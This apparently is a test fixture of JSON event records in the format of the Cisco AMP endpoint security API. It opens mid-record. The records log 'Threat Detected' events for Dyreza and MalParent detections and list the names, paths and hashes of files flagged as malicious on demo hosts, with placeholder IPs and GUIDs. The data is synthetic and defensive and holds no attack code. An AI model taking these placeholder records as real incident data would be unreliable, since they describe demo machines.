Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668099382575128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258371461579000,"timestamp":1610705692,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:14:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258371461578830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258324216938000,"timestamp":1610705681,"timestamp_nanoseconds":403000000,"date":"2021-01-15T10:14:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258324216938573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258272677331000,"timestamp":1610705669,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:14:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258272677331020","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258221137723000,"timestamp":1610705657,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:14:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258221137723467","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258169598116000,"timestamp":1610705645,"timestamp_nanoseconds":648000000,"date":"2021-01-15T10:14:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258169598115914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257843180601000,"timestamp":1610705569,"timestamp_nanoseconds":536000000,"date":"2021-01-15T10:12:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257843180601413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":834324,"timestamp":1610705568,"timestamp_nanoseconds":82375000,"date":"2021-01-15T10:12:48+00:00","event_type":"Uninstall","event_type_id":553648166,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257791640994000,"timestamp":1610705557,"timestamp_nanoseconds":898000000,"date":"2021-01-15T10:12:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257791640993860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257740101386000,"timestamp":1610705545,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:12:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257740101386307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257688561779000,"timestamp":1610705533,"timestamp_nanoseconds":874000000,"date":"2021-01-15T10:12:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257688561778754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} 